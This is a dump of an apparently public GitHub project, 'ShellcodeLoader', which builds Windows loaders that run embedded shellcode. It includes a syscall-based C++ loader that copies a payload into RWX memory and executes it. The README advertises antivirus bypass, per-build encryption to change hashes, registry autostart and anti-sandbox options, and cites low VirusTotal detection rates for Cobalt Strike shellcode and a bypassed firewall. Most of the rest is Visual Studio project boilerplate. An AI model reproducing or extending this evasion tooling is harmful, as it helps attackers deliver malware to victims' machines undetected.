104 | if (rva == 0) { goto cleanup; }
105 | ofs = rva2ofs(nt, rva);
106 | if (ofs == -1) { goto cleanup; }
107 | rf = (PIMAGE_RUNTIME_FUNCTION_ENTRY)(ofs + mem);
108 | // for each runtime function (there might be a better way??)
// NOTE(review): the walk stops at an entry whose BeginAddress is 0; the directory's
// Size field is not consulted.
109 | for (i = 0; rf[i].BeginAddress != 0; i++) {
110 | // is it our system call?
111 | start = rva2ofs(nt, rf[i].BeginAddress) + (ULONG64)mem;
112 | if (start == addr) {
113 | // save the end and calculate length
114 | end = rva2ofs(nt, rf[i].EndAddress) + (ULONG64)mem;
115 | len = (SIZE_T)(end - start);
116 | // allocate RWX memory
117 | cs = VirtualAlloc(NULL, len,
118 | MEM_COMMIT | MEM_RESERVE,
119 | PAGE_EXECUTE_READWRITE);
120 | if (cs != NULL) {
121 | // copy system call code stub to memory
122 | CopyMemory(cs, (const void*)start, len);
123 | }
124 | break;
125 | }
126 | }
127 | cleanup:
128 | if (mem != NULL) UnmapViewOfFile(mem);
129 | if (map != NULL) CloseHandle(map);
// NOTE(review): when CreateFileA failed, file is INVALID_HANDLE_VALUE rather than NULL,
// so this test still passes and CloseHandle is called on the invalid value.
130 | if (file != NULL) CloseHandle(file);
131 | // return pointer to code stub or NULL
132 | return cs;
133 | }
134 |
// Entry point of the "Syscall Load" template.
//
// What the visible code does, in order:
//   0. gets a private copy of the NtAllocateVirtualMemory code from GetSyscallStub;
//   1. obtains a payload pointer and size from GetShellcodeFromRes(100, ...);
//   2. calls that copy to commit PAGE_EXECUTE_READWRITE memory in the current process
//      and copies the payload into it;
//   3. calls the start of that memory as a function taking no arguments.
// The four WinMain parameters are not used. Every path returns 0.
//
// Analyst/defender view: everything happens inside the loader's own process, so there
// is no cross-process handle, write or thread to observe. The allocation request does
// not pass through the NtAllocateVirtualMemory export of the loaded ntdll; what stays
// visible is the resulting private RWX region and execution from it.
135 | int APIENTRY wWinMain(_In_ HINSTANCE hInstance, _In_opt_ HINSTANCE hPrevInstance, _In_ LPWSTR lpCmdLine, _In_ int nCmdShow)
136 | {
137 | //0.Get functions
// NOTE(review): GetSyscallStub can return NULL; the pointer is called below without a check.
138 | pNtAllocateVirtualMemory fnNtAllocateVirtualMemory = (pNtAllocateVirtualMemory)GetSyscallStub("NtAllocateVirtualMemory");
139 | //1.Get shellcode and shellcodesize from Resource by ID
140 | UINT shellcodeSize = 0;
// GetShellcodeFromRes is not defined in this file (the file includes ..\public.hpp).
141 | unsigned char *shellcode = GetShellcodeFromRes(100, shellcodeSize);
142 | if (shellcode == nullptr)
143 | {
144 | return 0;
145 | }
146 | //2.Get shellcode memory
147 | LPVOID Memory = NULL;
148 | SIZE_T uSize = shellcodeSize;
149 | HANDLE hProcess = GetCurrentProcess();
// Memory and uSize are passed by address and may be updated by the call.
150 | NTSTATUS status = fnNtAllocateVirtualMemory(hProcess, &Memory, 0, &uSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
// Any non-zero NTSTATUS is treated as failure.
151 | if (status != 0)
152 | {
153 | return 0;
154 | }
155 | memcpy(Memory, shellcode, shellcodeSize);
156 | //3.Execute shellcode
// Control is handed to the copied bytes on the current thread.
157 | ((void(*)())Memory)();
158 | return 0;
159 | }
--------------------------------------------------------------------------------
/Readme.md:
--------------------------------------------------------------------------------
1 | # ShellcodeLoader
2 |
3 | 语言: [中文](readme_cn.md)
4 |
5 | A shellcode loader for Windows that can bypass AV.
6 |
7 | ## Features
8 |
9 | 1. It has many loading modes. There are 13 loading modes in 32 bits and 12 loading modes in 64 bits.
10 |
11 | 2. Supports extension. If a new technique is found, you can develop a template for it by following the method described below.
12 |
13 | 3. Shellcode is automatically encrypted. Loaders generated from the same shellcode have different MD5 hashes, because the generator uses the time as a seed to randomly generate a 128-bit key for encryption.
14 |
15 |
16 |
17 | ## Build environment and method
18 |
19 | Environment: The generator uses MFC to implement the UI; the generator and the loader templates are developed in C++ and statically compiled with VS2015.
20 |
21 | Method: Open the project solution (.sln) with VS2015 and compile. You can also download the built product from [release](https://github.com/knownsec/shellcodeloader/releases/).
22 |
23 |
24 |
25 | ## Files
26 |
27 | The tool is composed of a generator (Shellcodeloader.exe) and numerous loader templates. Each loader template must be placed in the directory for its architecture (32 or 64), and those directories go into the DATA folder in the same directory as the generator.
28 |
29 |
30 |
31 |
32 |
33 | ## How to use
34 |
35 | 1. **Open the generator(shellcode.exe)**
36 |
37 | 
38 |
39 |
40 |
41 | 2. **Drag your raw shellcode(.bin) into the generator**
42 |
43 | 
44 |
45 |
46 |
47 | 3. **Choose the loader's arch (default x86), and select the configuration options you want: whether to autostart (the built-in method uses the registry) and whether to enable anti-sandbox (this option is not required for most 64-bit loaders)**
48 |
49 |
50 |
51 | 4. **Choose how you want to load it. The available loading methods depend on the loader templates in the DATA folder.**
52 |
53 | 
54 |
55 |
56 |
57 | 5. **Click Generate and the final loader will be generated on the desktop.**
58 |
59 | 
60 |
61 | ## How to expand
62 |
63 | 1. include public.hpp in your cpp.
64 |
65 |
66 |
67 | 2. Call the GetShellcodeFromRes() function to get the shellcode. The number 100 must not be changed unless you also change the resource ID in the generator.
68 |
69 | 
70 |
71 | It returns a pointer to the shellcode in the resource, and shellcodeSize is the size of the shellcode. In most cases this step doesn't need to be changed; you can do anything after you get the shellcode.
72 |
73 |
74 |
75 | 3. Load the shellcode with your method, and compile (PS: **Make sure you compile statically and turn off debug symbol linking**)
76 |
77 | 
78 |
79 |
80 |
81 | 4. Name the compiled template after the method; this name is the loading method's name shown in the UI. Change its extension to "DAT" and put it in the directory for the correct arch under the DATA folder. The generator will pick up the loading method automatically.
82 |
83 | 
84 |
85 |
86 |
87 | ### About public.hpp
88 |
89 | public.hpp contains the necessary comments. If you want other ways of anti-sandbox, you can change the content of the anti-sandbox function; if you want other ways of self-starting, you can change the content of the autostart function. In most cases, the contents of the other function bodies do not need to be changed.
90 |
91 |
92 |
93 | ## Result
94 |
95 | VirusTotal detection results, using the original Cobalt Strike shellcode without the anti-sandbox option as an example (each cell is engines that flagged the loader / engines that scanned it):
96 |
97 | | Loading methods | Detected |
98 | | --------------------------- | -------- |
99 | | CreateThreadpoolWait Load | 3/72 |
100 | | Fiber Load | 4/72 |
101 | | NtTestAlert Load | 5/70 |
102 | | SEH Except Load | 2/72 |
103 | | TLS CallBack Load | 28/71 |
104 | | Dynamic Load | 1/72 |
105 | | Dynamic Load plus | 28/71 |
106 | | Syscall Load | 1/69 |
107 | | APC-Inject Load | 6/72 |
108 | | Early Brid APC-Inject Load | 4/72 |
109 | | NtCreateSection-Inject Load | 2/71 |
110 | | OEP Hiijack-Inject Load | 3/72 |
111 | | Thread Hiijack-Inject Load | 6/72 |
112 |
113 | After checking the anti-sandbox option in the dynamic loading mode, the results are as follows:
114 |
115 | 
116 |
117 |
118 |
119 | With this loader, the outbound-connection interception of Norton's Smart Firewall was bypassed and the session came online:
120 |
121 | 
122 |
123 |
124 |
125 | ## Ref
126 |
127 | - [Antisandbox](https://0xpat.github.io/Malware_development_part_2/)
128 | - [RC4 Crypt](https://www.52pojie.cn/thread-800115-1-1.html)
129 | - [CreateThreadpoolWait Load](https://www.ired.team/offensive-security/code-injection-process-injection/shellcode-execution-via-createthreadpoolwait)
130 | - [Fiber Load](https://www.ired.team/offensive-security/code-injection-process-injection/executing-shellcode-with-createfiber)
131 | - [NtTestAlert Load](https://www.ired.team/offensive-security/code-injection-process-injection/shellcode-execution-in-a-local-process-with-queueuserapc-and-nttestalert)
132 | - [SEH except Load](https://idiotc4t.com/code-and-dll-process-injection/seh-code-execute)
133 | - [TLS callback Load](https://idiotc4t.com/code-and-dll-process-injection/tls-code-execute)
134 | - [syscall Load](https://modexp.wordpress.com/2020/06/01/syscalls-disassembler/)
135 | - [APC Inject Load](https://www.ired.team/offensive-security/code-injection-process-injection/apc-queue-code-injection)
136 | - [Early Bird APC Inject Load](https://www.ired.team/offensive-security/code-injection-process-injection/early-bird-apc-queue-code-injection)
137 | - [Early Brid APC Inject](https://www.ired.team/offensive-security/code-injection-process-injection/early-bird-apc-queue-code-injection)
138 | - [NtCreateSection Inject Load](https://www.ired.team/offensive-security/code-injection-process-injection/ntcreatesection-+-ntmapviewofsection-code-injection)
139 | - [OEP Hiijack Inject Load](https://www.ired.team/offensive-security/code-injection-process-injection/addressofentrypoint-code-injection-without-virtualallocex-rwx)
140 | - [Thread Hiijack Inject Load](https://idiotc4t.com/code-and-dll-process-injection/setcontext-hijack-thread)
141 | - 《加密与解密4》
142 |
--------------------------------------------------------------------------------
/plug/Syscall Load/Syscall Load.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {7A811860-B9FC-4F64-BE80-DE0D30551A21}
23 | Win32Proj
24 | SyscallLoad
25 | 8.1
26 |
27 |
28 |
29 | Application
30 | true
31 | v140
32 | Unicode
33 |
34 |
35 | Application
36 | false
37 | v140
38 | true
39 | Unicode
40 |
41 |
42 | Application
43 | true
44 | v140
45 | Unicode
46 |
47 |
48 | Application
49 | false
50 | v140
51 | true
52 | Unicode
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 | true
74 |
75 |
76 | true
77 |
78 |
79 | false
80 |
81 |
82 | false
83 | $(SolutionDir)\$(Configuration)\DATA\64
84 | .DAT
85 |
86 |
87 |
88 |
89 |
90 | Level3
91 | Disabled
92 | WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions)
93 |
94 |
95 | Windows
96 | true
97 |
98 |
99 |
100 |
101 |
102 |
103 | Level3
104 | Disabled
105 | _DEBUG;_WINDOWS;%(PreprocessorDefinitions)
106 |
107 |
108 | Windows
109 | true
110 |
111 |
112 |
113 |
114 | Level3
115 |
116 |
117 | MaxSpeed
118 | true
119 | true
120 | WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
121 |
122 |
123 | Windows
124 | true
125 | true
126 | true
127 |
128 |
129 |
130 |
131 | Level3
132 |
133 |
134 | MaxSpeed
135 | true
136 | true
137 | NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
138 | MultiThreaded
139 |
140 |
141 | Windows
142 | true
143 | true
144 | false
145 |
146 |
147 |
148 |
149 |
150 |
151 |
152 |
153 |
--------------------------------------------------------------------------------
/plug/Fiber Load/Fiber Load.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {A724B8F7-FDF3-441B-BB1D-11C1C6FDC64B}
23 | Win32Proj
24 | FiberLoad
25 | 8.1
26 |
27 |
28 |
29 | Application
30 | true
31 | v140
32 | Unicode
33 |
34 |
35 | Application
36 | false
37 | v140
38 | true
39 | Unicode
40 |
41 |
42 | Application
43 | true
44 | v140
45 | Unicode
46 |
47 |
48 | Application
49 | false
50 | v140
51 | true
52 | Unicode
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 | true
74 |
75 |
76 | true
77 |
78 |
79 | false
80 | $(SolutionDir)$(Configuration)\DATA\32
81 | .DAT
82 |
83 |
84 | false
85 | $(SolutionDir)\$(Configuration)\DATA\64
86 | .DAT
87 |
88 |
89 |
90 |
91 |
92 | Level3
93 | Disabled
94 | WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions)
95 |
96 |
97 | Windows
98 | true
99 |
100 |
101 |
102 |
103 |
104 |
105 | Level3
106 | Disabled
107 | _DEBUG;_WINDOWS;%(PreprocessorDefinitions)
108 |
109 |
110 | Windows
111 | true
112 |
113 |
114 |
115 |
116 | Level3
117 |
118 |
119 | MaxSpeed
120 | true
121 | true
122 | WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
123 | MultiThreaded
124 |
125 |
126 | Windows
127 | true
128 | true
129 | false
130 |
131 |
132 |
133 |
134 | Level3
135 |
136 |
137 | MaxSpeed
138 | true
139 | true
140 | NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
141 | MultiThreaded
142 |
143 |
144 | Windows
145 | true
146 | true
147 | false
148 |
149 |
150 |
151 |
152 |
153 |
154 |
155 |
156 |
--------------------------------------------------------------------------------
/plug/Direct Load/Direct Load.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {95367D52-E3A0-46BF-BCAA-AAC13EAF244D}
23 | Win32Proj
24 | DirectLoad
25 | 8.1
26 |
27 |
28 |
29 | Application
30 | true
31 | v140
32 | Unicode
33 |
34 |
35 | Application
36 | false
37 | v140
38 | true
39 | Unicode
40 |
41 |
42 | Application
43 | true
44 | v140
45 | Unicode
46 |
47 |
48 | Application
49 | false
50 | v140
51 | true
52 | Unicode
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 | true
74 |
75 |
76 | true
77 |
78 |
79 | false
80 | $(SolutionDir)$(Configuration)\DATA\32
81 | .DAT
82 |
83 |
84 | false
85 | $(SolutionDir)\$(Configuration)\DATA\64
86 | .DAT
87 |
88 |
89 |
90 |
91 |
92 | Level3
93 | Disabled
94 | WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions)
95 |
96 |
97 | Windows
98 | true
99 |
100 |
101 |
102 |
103 |
104 |
105 | Level3
106 | Disabled
107 | _DEBUG;_WINDOWS;%(PreprocessorDefinitions)
108 |
109 |
110 | Windows
111 | true
112 |
113 |
114 |
115 |
116 | Level3
117 |
118 |
119 | MaxSpeed
120 | true
121 | true
122 | WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
123 | MultiThreaded
124 |
125 |
126 | Windows
127 | true
128 | true
129 | false
130 |
131 |
132 |
133 |
134 | Level3
135 |
136 |
137 | MaxSpeed
138 | true
139 | true
140 | NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
141 | MultiThreaded
142 |
143 |
144 | Windows
145 | true
146 | true
147 | false
148 |
149 |
150 |
151 |
152 |
153 |
154 |
155 |
156 |
--------------------------------------------------------------------------------
/plug/APC-Ijnect Load/APC-Ijnect Load.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {85B4ED76-7171-4CDF-B909-654E77F54FA4}
23 | Win32Proj
24 | APCIjnectLoad
25 | 8.1
26 |
27 |
28 |
29 | Application
30 | true
31 | v140
32 | Unicode
33 |
34 |
35 | Application
36 | false
37 | v140
38 | true
39 | Unicode
40 |
41 |
42 | Application
43 | true
44 | v140
45 | Unicode
46 |
47 |
48 | Application
49 | false
50 | v140
51 | true
52 | Unicode
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 | true
74 |
75 |
76 | true
77 |
78 |
79 | false
80 | $(SolutionDir)$(Configuration)\DATA\32
81 | .DAT
82 |
83 |
84 | false
85 | $(SolutionDir)\$(Configuration)\DATA\64
86 | .DAT
87 |
88 |
89 |
90 |
91 |
92 | Level3
93 | Disabled
94 | WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions)
95 |
96 |
97 | Windows
98 | true
99 |
100 |
101 |
102 |
103 |
104 |
105 | Level3
106 | Disabled
107 | _DEBUG;_WINDOWS;%(PreprocessorDefinitions)
108 |
109 |
110 | Windows
111 | true
112 |
113 |
114 |
115 |
116 | Level3
117 |
118 |
119 | MaxSpeed
120 | true
121 | true
122 | WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
123 | MultiThreaded
124 |
125 |
126 | Windows
127 | true
128 | true
129 | false
130 |
131 |
132 |
133 |
134 | Level3
135 |
136 |
137 | MaxSpeed
138 | true
139 | true
140 | NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
141 | MultiThreaded
142 |
143 |
144 | Windows
145 | true
146 | true
147 | false
148 |
149 |
150 |
151 |
152 |
153 |
154 |
155 |
156 |
--------------------------------------------------------------------------------
/plug/SEH Except Load/SEH Except Load.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {8C71DB50-A5B1-4354-A7C7-901E36DDC8AB}
23 | Win32Proj
24 | SEHExceptLoad
25 | 8.1
26 |
27 |
28 |
29 | Application
30 | true
31 | v140
32 | Unicode
33 |
34 |
35 | Application
36 | false
37 | v140
38 | true
39 | Unicode
40 |
41 |
42 | Application
43 | true
44 | v140
45 | Unicode
46 |
47 |
48 | Application
49 | false
50 | v140
51 | true
52 | Unicode
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 | true
74 |
75 |
76 | true
77 |
78 |
79 | false
80 | $(SolutionDir)$(Configuration)\DATA\32
81 | .DAT
82 |
83 |
84 | false
85 | $(SolutionDir)\$(Configuration)\DATA\64
86 | .DAT
87 |
88 |
89 |
90 |
91 |
92 | Level3
93 | Disabled
94 | WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions)
95 |
96 |
97 | Windows
98 | true
99 |
100 |
101 |
102 |
103 |
104 |
105 | Level3
106 | Disabled
107 | _DEBUG;_WINDOWS;%(PreprocessorDefinitions)
108 |
109 |
110 | Windows
111 | true
112 |
113 |
114 |
115 |
116 | Level3
117 |
118 |
119 | MaxSpeed
120 | true
121 | true
122 | WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
123 | MultiThreaded
124 |
125 |
126 | Windows
127 | true
128 | true
129 | false
130 |
131 |
132 |
133 |
134 | Level3
135 |
136 |
137 | MaxSpeed
138 | true
139 | true
140 | NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
141 | MultiThreaded
142 |
143 |
144 | Windows
145 | true
146 | true
147 | false
148 |
149 |
150 |
151 |
152 |
153 |
154 |
155 |
156 |
--------------------------------------------------------------------------------
/plug/NtTestAlert Load/NtTestAlert Load.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {0E01D108-8DD7-4164-BABD-5257095F0CAF}
23 | Win32Proj
24 | NtTestAlertLoad
25 | 8.1
26 |
27 |
28 |
29 | Application
30 | true
31 | v140
32 | Unicode
33 |
34 |
35 | Application
36 | false
37 | v140
38 | true
39 | Unicode
40 |
41 |
42 | Application
43 | true
44 | v140
45 | Unicode
46 |
47 |
48 | Application
49 | false
50 | v140
51 | true
52 | Unicode
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 | true
74 |
75 |
76 | true
77 |
78 |
79 | false
80 | $(SolutionDir)$(Configuration)\DATA\32
81 | .DAT
82 |
83 |
84 | false
85 | $(SolutionDir)\$(Configuration)\DATA\64
86 | .DAT
87 |
88 |
89 |
90 |
91 |
92 | Level3
93 | Disabled
94 | WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions)
95 |
96 |
97 | Windows
98 | true
99 |
100 |
101 |
102 |
103 |
104 |
105 | Level3
106 | Disabled
107 | _DEBUG;_WINDOWS;%(PreprocessorDefinitions)
108 |
109 |
110 | Windows
111 | true
112 |
113 |
114 |
115 |
116 | Level3
117 |
118 |
119 | MaxSpeed
120 | true
121 | true
122 | WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
123 | MultiThreaded
124 |
125 |
126 | Windows
127 | true
128 | true
129 | false
130 |
131 |
132 |
133 |
134 | Level3
135 |
136 |
137 | MaxSpeed
138 | true
139 | true
140 | NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
141 | MultiThreaded
142 |
143 |
144 | Windows
145 | true
146 | true
147 | false
148 |
149 |
150 |
151 |
152 |
153 |
154 |
155 |
156 |
--------------------------------------------------------------------------------
/plug/OEP Hiijack-Inject Load/OEP Hiijack-Inject Load.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {7CCFF851-1E2C-4EAD-8415-BB4CBB96FFE0}
23 | Win32Proj
24 | OEPHiijackInjectLoad
25 | 8.1
26 |
27 |
28 |
29 | Application
30 | true
31 | v140
32 | Unicode
33 |
34 |
35 | Application
36 | false
37 | v140
38 | true
39 | Unicode
40 |
41 |
42 | Application
43 | true
44 | v140
45 | Unicode
46 |
47 |
48 | Application
49 | false
50 | v140
51 | true
52 | Unicode
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 | true
74 |
75 |
76 | true
77 |
78 |
79 | false
80 | $(SolutionDir)$(Configuration)\DATA\32
81 | .DAT
82 |
83 |
84 | false
85 | $(SolutionDir)\$(Configuration)\DATA\64
86 | .DAT
87 |
88 |
89 |
90 |
91 |
92 | Level3
93 | Disabled
94 | WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions)
95 |
96 |
97 | Windows
98 | true
99 |
100 |
101 |
102 |
103 |
104 |
105 | Level3
106 | Disabled
107 | _DEBUG;_WINDOWS;%(PreprocessorDefinitions)
108 |
109 |
110 | Windows
111 | true
112 |
113 |
114 |
115 |
116 | Level3
117 |
118 |
119 | MaxSpeed
120 | true
121 | true
122 | WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
123 | MultiThreaded
124 |
125 |
126 | Windows
127 | true
128 | true
129 | false
130 |
131 |
132 |
133 |
134 | Level3
135 |
136 |
137 | MaxSpeed
138 | true
139 | true
140 | NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
141 | MultiThreaded
142 |
143 |
144 | Windows
145 | true
146 | true
147 | false
148 |
149 |
150 |
151 |
152 |
153 |
154 |
155 |
156 |
--------------------------------------------------------------------------------
/plug/Thread Hiijack-Inject Load/Thread Hiijack-Inject Load.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {9C8E8054-B951-44F4-9B6C-9021BE918EC8}
23 | Win32Proj
24 | ThreadHiijackInjectLoad
25 | 8.1
26 |
27 |
28 |
29 | Application
30 | true
31 | v140
32 | Unicode
33 |
34 |
35 | Application
36 | false
37 | v140
38 | true
39 | Unicode
40 |
41 |
42 | Application
43 | true
44 | v140
45 | Unicode
46 |
47 |
48 | Application
49 | false
50 | v140
51 | true
52 | Unicode
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 | true
74 |
75 |
76 | true
77 |
78 |
79 | false
80 | $(SolutionDir)$(Configuration)\DATA\32
81 | .DAT
82 |
83 |
84 | false
85 | $(SolutionDir)\$(Configuration)\DATA\64
86 | .DAT
87 |
88 |
89 |
90 |
91 |
92 | Level3
93 | Disabled
94 | WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions)
95 |
96 |
97 | Windows
98 | true
99 |
100 |
101 |
102 |
103 |
104 |
105 | Level3
106 | Disabled
107 | _DEBUG;_WINDOWS;%(PreprocessorDefinitions)
108 |
109 |
110 | Windows
111 | true
112 |
113 |
114 |
115 |
116 | Level3
117 |
118 |
119 | MaxSpeed
120 | true
121 | true
122 | WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
123 | MultiThreaded
124 |
125 |
126 | Windows
127 | true
128 | true
129 | false
130 |
131 |
132 |
133 |
134 | Level3
135 |
136 |
137 | MaxSpeed
138 | true
139 | true
140 | NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
141 | MultiThreaded
142 |
143 |
144 | Windows
145 | true
146 | true
147 | false
148 |
149 |
150 |
151 |
152 |
153 |
154 |
155 |
156 |
--------------------------------------------------------------------------------
/plug/Early Bird APC-Injetc Load/Early Bird APC-Injetc Load.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {F5D3E249-2D2F-4C8F-99D9-4ED661ADBC57}
23 | Win32Proj
24 | EarlyBirdAPCInjetcLoad
25 | 8.1
26 |
27 |
28 |
29 | Application
30 | true
31 | v140
32 | Unicode
33 |
34 |
35 | Application
36 | false
37 | v140
38 | true
39 | Unicode
40 |
41 |
42 | Application
43 | true
44 | v140
45 | Unicode
46 |
47 |
48 | Application
49 | false
50 | v140
51 | true
52 | Unicode
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 | true
74 |
75 |
76 | true
77 |
78 |
79 | false
80 | $(SolutionDir)$(Configuration)\DATA\32
81 | .DAT
82 |
83 |
84 | false
85 | $(SolutionDir)\$(Configuration)\DATA\64
86 | .DAT
87 |
88 |
89 |
90 |
91 |
92 | Level3
93 | Disabled
94 | WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions)
95 |
96 |
97 | Windows
98 | true
99 |
100 |
101 |
102 |
103 |
104 |
105 | Level3
106 | Disabled
107 | _DEBUG;_WINDOWS;%(PreprocessorDefinitions)
108 |
109 |
110 | Windows
111 | true
112 |
113 |
114 |
115 |
116 | Level3
117 |
118 |
119 | MaxSpeed
120 | true
121 | true
122 | WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
123 | MultiThreaded
124 |
125 |
126 | Windows
127 | true
128 | true
129 | false
130 |
131 |
132 |
133 |
134 | Level3
135 |
136 |
137 | MaxSpeed
138 | true
139 | true
140 | NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
141 | MultiThreaded
142 |
143 |
144 | Windows
145 | true
146 | true
147 | false
148 |
149 |
150 |
151 |
152 |
153 |
154 |
155 |
156 |
--------------------------------------------------------------------------------
/plug/NtCreateSection-Inject Load/NtCreateSection-Inject Load.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {53C190DB-62BA-4D22-BEB9-BAC5F35D8893}
23 | Win32Proj
24 | NtCreateSectionInjectLoad
25 | 8.1
26 |
27 |
28 |
29 | Application
30 | true
31 | v140
32 | Unicode
33 |
34 |
35 | Application
36 | false
37 | v140
38 | true
39 | Unicode
40 |
41 |
42 | Application
43 | true
44 | v140
45 | Unicode
46 |
47 |
48 | Application
49 | false
50 | v140
51 | true
52 | Unicode
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 | true
74 |
75 |
76 | true
77 |
78 |
79 | false
80 | $(SolutionDir)$(Configuration)\DATA\32
81 | .DAT
82 |
83 |
84 | false
85 | $(SolutionDir)\$(Configuration)\DATA\64
86 | .DAT
87 |
88 |
89 |
90 |
91 |
92 | Level3
93 | Disabled
94 | WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions)
95 |
96 |
97 | Windows
98 | true
99 |
100 |
101 |
102 |
103 |
104 |
105 | Level3
106 | Disabled
107 | _DEBUG;_WINDOWS;%(PreprocessorDefinitions)
108 |
109 |
110 | Windows
111 | true
112 |
113 |
114 |
115 |
116 | Level3
117 |
118 |
119 | MaxSpeed
120 | true
121 | true
122 | WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
123 | MultiThreaded
124 |
125 |
126 | Windows
127 | true
128 | true
129 | false
130 |
131 |
132 |
133 |
134 | Level3
135 |
136 |
137 | MaxSpeed
138 | true
139 | true
140 | NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
141 | MultiThreaded
142 |
143 |
144 | Windows
145 | true
146 | true
147 | false
148 |
149 |
150 |
151 |
152 |
153 |
154 |
155 |
156 |
--------------------------------------------------------------------------------
/plug/Dynamic Load/Dynamic Load.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {E09E4077-06F1-4A26-AFBA-D5FFE8BE10B3}
23 | Win32Proj
24 | DynamicLoad
25 | 8.1
26 |
27 |
28 |
